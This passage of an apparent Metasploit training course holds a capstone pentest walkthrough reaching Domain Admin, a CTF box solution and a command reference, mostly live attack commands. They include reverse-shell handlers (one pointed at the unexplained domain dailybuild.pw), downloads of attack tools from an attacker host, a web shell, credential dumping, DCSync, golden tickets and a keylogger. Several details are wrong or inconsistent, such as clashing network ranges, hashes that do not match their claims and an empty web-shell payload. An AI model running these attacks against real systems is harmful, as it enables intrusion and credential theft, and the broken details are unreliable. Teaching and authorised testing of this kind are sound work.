team_password -S -f\n\n# Now team members can connect:\nmsfconsole --rpc\n# Or connect via msfrpc client in Python:\n# from metasploit.msf import MsfRpcClient\n# client = MsfRpcClient('team_password', port=55553)\n```\n\n#### Logging and Audit\n\n```bash\n# Enable detailed logging\n# In msfconsole:\nmsf6 &gt; set Global verbose\n\n# Set log directory\nmsf6 &gt; set LogLevel 3\n\n# Save all output to file\nmsf6 &gt; makerc /tmp/assessment.rc\n\n# Export complete database\nmsf6 &gt; db_export -f xml /tmp/assessment_data.xml\nmsf6 &gt; db_export -f pwdump /tmp/assessment_hashes.txt\n\n# Store loot in organized directory\nmkdir -p /tmp/loot/{hosts,services,credentials,screenshots}\n```\n\n---\n\n### Exercise 33.1\n\n**Task**:\n\n1. Configure PostgreSQL database for MSF\n2. Create a workspace for your assessment\n3. Import an Nmap scan XML result\n4. Set up a high-performance configuration\n5. Create a resource script that initializes everything in one command\n6. Configure log rotation for MSF logs\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Configure PostgreSQL\nsudo systemctl start postgresql\nsudo systemctl enable postgresql\nsudo -u postgres createuser msf -P\nsudo -u postgres createdb -O msf msfdb\n\n# 2. Create database.yml\nmkdir -p ~/.msf4\ncat &gt; ~/.msf4/database.yml &lt;&lt; 'EOF'\nproduction:\n  adapter: postgresql\n  database: msfdb\n  username: msf\n  password: msf_secure_password_2024\n  host: 127.0.0.1\n  port: 5432\n  pool: 5\n  timeout: 5\nEOF\n\n# 3. Create workspace\nmsfconsole -q\nmsf6 &gt; workspace -a RedTeamAssessment\nmsf6 &gt; workspace RedTeamAssessment\n\n# 4. Import Nmap scan\nmsf6 &gt; db_import /tmp/nmap_scan.xml\nmsf6 &gt; hosts\nmsf6 &gt; services\n\n# 5. High-performance config\ncat &gt; ~/.msf4/msf4.yml &lt;&lt; 'EOF'\nperformance:\n  thread_limit: 20\n  mass_assessment_max: 1000\ndb:\n  mass_assessment_import: true\nlogging:\n  level: verbose\nEOF\n\n# 6. 
Set up resource script\ncat &gt; /tmp/msf_setup.rc &lt;&lt; 'EOF'\n# Initialize MSF for assessment\nworkspace -a RedTeamAssessment\nsetg THREADS 20\nsetg VERBOSE true\n\n# High performance DB\ndb_import /tmp/nmap_scan.xml\n\n# Configure SOCKS for pivoting\nuse auxiliary/server/socks_proxy\nset SRVHOST 127.0.0.1\nset SRVPORT 1080\nrun -j\n\n# Set up handler\nuse exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Show initial status\nhosts\nservices\njobs\nEOF\n\n# Run: msfconsole -q -r /tmp/msf_setup.rc\n\n# 7. Log rotation\n# Add to /etc/logrotate.d/metasploit\n# (the redirect must run as root: \"sudo cat &gt; file\" would open the file as the unprivileged user, so use tee)\nsudo tee /etc/logrotate.d/metasploit &gt; /dev/null &lt;&lt; 'EOF'\n/var/log/msf/*.log {\n    daily\n    rotate 7\n    compress\n    delaycompress\n    notifempty\n    create 0640 root root\n}\nEOF\n```\n\n\n\n---\n\n# Module 8: Capstone Projects\n\n---\n\n## Capstone 1: Full Penetration Test with Complete Attack Chain\n\n### Scenario Overview\n\n**Objective:** Perform a complete penetration test against a target organization called `SecureCorp Ltd.` Your objective is to achieve Domain Admin within the internal network.\n\n**Scope:**\n- External: 203.0.113.0/24 (single public IP: 203.0.113.50)\n- Internal: 192.168.1.0/24 (Windows AD environment)\n- DMZ: 192.168.1.50 (public-facing web server)\n- Internal: 192.168.1.0/24 (full AD domain: securecorp.local)\n- Domain Controllers: 192.168.1.10 (DC01), 192.168.1.11 (DC02)\n\n**Rules:**\n- No DoS attacks\n- Document all findings\n- Immediate stop if ransomware or destructive actions are triggered\n- All exploitation via MSF unless specified otherwise\n\n### Phase 1: External Reconnaissance\n\n**Step 1.1: Initial Port Scan**\n\n```bash\n# Start MSF with database\nmsfconsole -q\nmsf6 &gt; db_nmap -sT -sV -sC -O -p 1-10000 -oA /tmp/external_scan 203.0.113.50\n\n# Results show:\n# PORT     STATE  SERVICE  VERSION\n# 22       open   ssh      OpenSSH 8.4 (Ubuntu)\n# 80       
open   http     Apache 2.4.41\n# 443      open   https    Apache 2.4.41\n# 3306     open   mysql    MySQL 8.0.23\n# 8080     open   http     Apache Tomcat 9.0.43\n```\n\n**Step 1.2: Web Enumeration**\n\n```bash\n# Directory scan\nmsf6 &gt; use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) &gt; set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/dir_scanner) &gt; run\n\n# Results:\n# /admin (Tomcat manager)\n# /phpmyadmin\n# /backup\n# /api\n\n# Nikto web scan\nmsf6 &gt; use auxiliary/scanner/http/cert\nmsf6 auxiliary(scanner/http/cert) &gt; set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/cert) &gt; run\n```\n\n**Step 1.3: Tomcat Exploitation**\n\n```bash\n# Tomcat manager brute force\nmsf6 &gt; use auxiliary/scanner/http/tomcat_mgr_login\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; set RPORT 8080\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; run\n\n# Result:\n# 203.0.113.50:8080 - TOMCAT_MANAGER - tomcat:s3cretP@ss123! 
- SUCCESS\n```\n\n**Step 1.4: Deploy Webshell via Tomcat**\n\n```bash\n# Upload WAR with meterpreter\nmsf6 &gt; use exploit/multi/http/tomcat_mgr_upload\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set RHOSTS 203.0.113.50\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set RPORT 8080\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set USERNAME tomcat\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set PASSWORD s3cretP@ss123!\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set PAYLOAD java/meterpreter/reverse_tcp\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set LHOST 10.0.0.5\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; set LPORT 4444\nmsf6 exploit(multi/http/tomcat_mgr_upload) &gt; exploit\n\n# Result: Java Meterpreter session on DMZ host (192.168.1.50)\n```\n\n### Phase 2: Internal Reconnaissance\n\n**Step 2.1: Network Enumeration**\n\n```bash\n# From meterpreter session:\nmeterpreter &gt; ipconfig\n# Shows:\n# Interface 11: 192.168.1.50 (DMZ host)\n# Interface 12: 10.10.10.0/24 (Internal network via VLAN)\n\n# Add route to internal network\nmeterpreter &gt; run autoroute -s 10.10.10.0/24\nmsf6 &gt; route add 10.10.10.0 255.255.255.0 1\n\n# Scan internal network through pivot\nmsf6 &gt; use auxiliary/scanner/portscan/tcp\nmsf6 auxiliary(scanner/portscan/tcp) &gt; set RHOSTS 10.10.10.0/24\nmsf6 auxiliary(scanner/portscan/tcp) &gt; set PORTS 1-1000\nmsf6 auxiliary(scanner/portscan/tcp) &gt; set THREADS 20\nmsf6 auxiliary(scanner/portscan/tcp) &gt; run\n\n# Results:\n# 10.10.10.10 - 22, 80, 443, 445, 3389 (Server)\n# 10.10.10.20 - 22, 80, 443, 3268, 636 (Domain Controller)\n```\n\n**Step 2.2: AD Enumeration**\n\n```bash\n# From meterpreter shell on DMZ:\nmeterpreter &gt; shell\nC:\\&gt; cd C:\\\\Windows\\\\Temp\nC:\\Windows\\Temp&gt; curl http://10.0.0.5/PowerView.ps1 -o PowerView.ps1\nC:\\Windows\\Temp&gt; powershell -ExecutionPolicy Bypass -File PowerView.ps1\nPS C:\\&gt; Import-Module .\\PowerView.ps1\nPS C:\\&gt; Get-NetDomain\n\n# Forest: 
securecorp.local\n# DomainControllers: DC01, DC02\n\nPS C:\\> Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\n\n# Output:\n# samaccountname    serviceprincipalname\n# svc_sql           MSSQLSvc/sql01.securecorp.local\n# svc_backup        MSSQLSvc/backup.securecorp.local\n# svc_web           http/web.securecorp.local\n```\n\n### Phase 3: Kerberoasting\n\n**Step 3.1: Request TGS Tickets**\n\n```bash\n# From meterpreter with PowerShell:\nPS C:\\> IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1')\nPS C:\\> Invoke-Mimikatz -Command '\"kerberos::list /export\"'\n\n# This exports all TGS tickets\n# Alternative: use MSF module\nmsf6 > use auxiliary/admin/kerberos/ticket_export\nset SESSION 1\nset USER svc_sql\nrun\n\n# Crack with hashcat\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n# Result: svc_sql:MyStr0ngP@ssw0rd!\n```\n\n### Phase 4: Lateral Movement\n\n**Step 4.1: Pass-the-Hash to SQL Server**\n\n```bash\n# With cracked svc_sql hash:\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.30\nmsf6 exploit(windows/smb/psexec) > set SMBUser svc_sql\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# New session on SQL Server (10.10.10.30)\n```\n\n**Step 4.2: Privilege Escalation to SYSTEM**\n\n```bash\n# On SQL Server session:\nmeterpreter > getsystem -t 3\n[*] Escalating to SYSTEM via reflective DLL...\n[*] Already at SYSTEM privilege level\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\n```\n\n### Phase 5: Domain Dominance\n\n**Step 5.1: DCSync Attack**\n\n```bash\n# Load kiwi and extract krbtgt hash\nmeterpreter > load kiwi\nmeterpreter > 
dcsync_ntlm SECURECORP\\\\krbtgt\n\n# Output:\n# Hash: 31d6cfe0d16ae931b73c59d7e0c089c0\n# SID: S-1-5-21-1234567890-1234567890-1234567890\n\n# Also get administrator hash\nmeterpreter > dcsync_ntlm SECURECORP\\\\Administrator\n```\n\n**Step 5.2: Golden Ticket Attack**\n\n```bash\n# Create golden ticket\nmeterpreter > golden_ticket_create -d SECURECORP.LOCAL \\\n  -k 31d6cfe0d16ae931b73c59d7e0c089c0 \\\n  -s S-1-5-21-1234567890-1234567890-1234567890 \\\n  -u Administrator \\\n  -t /tmp/golden_ticket.kirbi\n\n# Use the ticket\nmeterpreter > kerberos_ticket_use /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter > getuid\nServer username: SECURECORP\\Administrator\n\n# Now access Domain Controller\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.20\nmsf6 exploit(windows/smb/psexec) > set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# Result: Meterpreter on Domain Controller as SYSTEM\n```\n\n### Phase 6: Documentation & Reporting\n\n**Step 6.1: Export All Data**\n\n```bash\n# Export database\nmsf6 > db_export -f xml /tmp/pentest_report.xml\n\n# Export credentials\nmsf6 > creds all\n\n# Export hosts and services\nmsf6 > hosts -o /tmp/hosts.csv\nmsf6 > services -o /tmp/services.csv\n\n# Export loot\nmsf6 > loot\n```\n\n**Step 6.2: Findings Summary**\n\n```\nFINDINGS SUMMARY\n================\n\nCritical Findings:\n1. CVE-2024-XXXX: Apache Tomcat Manager RCE (CVSS 9.8)\n   - Default credentials tomcat:s3cretP@ss123!\n   - Allows WAR file deployment\n   - Remote code execution as root/SYSTEM\n\n2. 
Kerberoasting: SPN accounts with weak passwords\n   - svc_sql password cracked: MyStr0ngP@ssw0rd!\n   - Allowed lateral movement to SQL Server\n\n3. DCSync: Domain admin via krbtgt hash extraction\n   - SYSTEM access on any domain server allows DCSync\n   - Golden ticket created for persistence\n\nImpact:\n- Full Domain Admin achieved\n- All domain credentials can be extracted\n- Persistent access established via golden ticket\n- Data exfiltration possible from any domain resource\n\nRecommendations:\n1. Remove default Tomcat credentials\n2. Implement strong passwords for SPN accounts\n3. Monitor for DCSync attacks (Event ID 4662)\n4. Implement privileged access workstations\n5. Deploy HoneyTokens for Kerberoast detection\n```\n\n---\n\n## Capstone 2: CTF Challenge \u2014 \"HackTheBox-Style Full Box\"\n\n### Challenge Setup\n\n**Target:** 192.168.56.101 (single VM, VulnHub style)\n\n**Objective:** Capture two flags: `user.txt` and `root.txt`\n\n**Phases:**\n1. Port scanning and enumeration\n2. Web exploitation\n3. Initial shell access\n4. Privilege escalation to user\n5. 
Root access and flag capture\n\n### Walkthrough\n\n**Step 1: Initial Scan**\n\n```bash\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -A -p- -oA /tmp/htb_scan 192.168.56.101\n\n# Results:\n# PORT     STATE  SERVICE  VERSION\n# 22       open   ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1\n# 80       open   http     Apache 2.4.41 (Ubuntu)\n# 3306     open   mysql    MySQL 8.0.23\n```\n\n**Step 2: Web Enumeration**\n\n```bash\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.101\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n\n# Found: /admin (phpMyAdmin), /dashboard, /uploads\n```\n\n**Step 3: SQL Injection**\n\n```bash\n# Test for SQL injection on login form\nmsf6 > use auxiliary/scanner/http/sql_injection\n# Manual testing reveals: POST to /login with username parameter is vulnerable\n\n# Use sqlmap to confirm and extract data\n# From attacker machine (not MSF):\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" --dbs\n# Database: webapp\n# Extract credentials\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" -D webapp -T users --dump\n```\n\n**Step 4: phpMyAdmin Exploitation**\n\n```bash\n# From sqlmap results: root:RootP@ssw0rd!@mysql\n# Use phpMyAdmin to write web shell\nmsf6 > use auxiliary/admin/http/phpmyadmin_superuser\nset RHOSTS 192.168.56.101\nset USERNAME root\nset PASSWORD RootP@ssw0rd!@mysql\nrun\n\n# Write shell via INTO OUTFILE\nmsf6 > use auxiliary/admin/mysql/mysql_sql\nset SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nrun\n```\n\n**Step 5: Initial Shell**\n\n```bash\n# Access web shell\ncurl http://192.168.56.101/shell.php?cmd=whoami\n# www-data\n\n# Generate and upload meterpreter\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o /tmp/shell.elf\n# Upload via web shell\ncurl -F \"file=@/tmp/shell.elf\" http://192.168.56.101/upload\n# Execute via web shell\ncurl 
http://192.168.56.101/shell.php?cmd=chmod%20+x%20/tmp/shell.elf%3b/tmp/shell.elf\n```\n\n**Step 6: User Flag**\n\n```bash\n# Meterpreter session established\nmeterpreter > shell\n$ python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n$ cd /home\n$ ls\nubuntu\n$ cat /home/ubuntu/user.txt\nHTB{usr_fl4g_h3r3_m8r7}\n```\n\n**Step 7: Privilege Escalation**\n\n```bash\n# From meterpreter:\n$ find / -perm -4000 -type f 2>/dev/null\n/usr/bin/bash\n/usr/bin/sudo\n\n$ sudo -l\nUser ubuntu may run the following commands on this host:\n    (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n\n$ cat /root/root.txt\nHTB{r00t_fl4g_h3r3_m8r7}\n```\n\n**Step 8: Alternative: Kernel Exploit**\n\n```bash\n# If sudo wasn't available:\n# Check kernel version\n$ uname -a\nLinux 5.4.0-77-generic #86-Ubuntu x86_64\n\n# Search for exploit\nsearchsploit linux kernel 5.4 priv esc\n# EDB: 45010.c - Ubuntu 18.04 privilege escalation\n\n# Download, compile, execute\n$ curl http://10.0.0.5/45010.c -o /tmp/exploit.c\n$ gcc /tmp/exploit.c -o /tmp/exploit\n$ chmod +x /tmp/exploit\n$ /tmp/exploit\n# root\n```\n\n---\n\n## Quick Reference: All Essential MSF Commands\n\n### Module Navigation\n```bash\nmsf6 > search type:exploit name:eternalblue platform:windows\nmsf6 > use exploit/windows/smb/ms17_010_eternalblue\nmsf6 exploit(...) > show options\nmsf6 exploit(...) > show payloads\nmsf6 exploit(...) > set RHOSTS 192.168.1.50\nmsf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(...) > set LHOST 10.0.0.5\nmsf6 exploit(...) 
> exploit\n```\n\n### Meterpreter Core\n```bash\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\nmeterpreter > ps\nmeterpreter > migrate \nmeterpreter > shell\nmeterpreter > background\nmeterpreter > exit\n```\n\n### File Operations\n```bash\nmeterpreter > ls\nmeterpreter > pwd\nmeterpreter > cd /path\nmeterpreter > upload /local /remote\nmeterpreter > download /remote /local\nmeterpreter > search -d / -f *.txt\n```\n\n### Network Operations\n```bash\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\nmeterpreter > run autoroute -s 10.10.10.0/24\n```\n\n### Credential Operations\n```bash\nmeterpreter > hashdump\nmeterpreter > load kiwi\nmeterpreter > creds\nmeterpreter > run post/windows/gather/credentials/credential_collector\n```\n\n### Post-Exploitation\n```bash\nmeterpreter > run post/windows/manage/migrate\nmeterpreter > run post/windows/gather/hashdump\nmeterpreter > run post/windows/gather/enum_logged_on_users\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\n```\n\n### Database Operations\n```bash\nmsf6 > db_status\nmsf6 > hosts\nmsf6 > services\nmsf6 > creds\nmsf6 > loot\nmsf6 > notes\nmsf6 > db_import /tmp/scan.xml\nmsf6 > db_export -f xml /tmp/results.xml\n```\n\n### Resource Scripts\n```bash\nmsfconsole -q -r /tmp/script.rc\nmsf6 > makerc /tmp/ops.rc\nmsf6 > resource /tmp/script.rc\n```\n\n---\n\n", "creation_timestamp": "2026-06-13T10:28:11.000000Z"}]}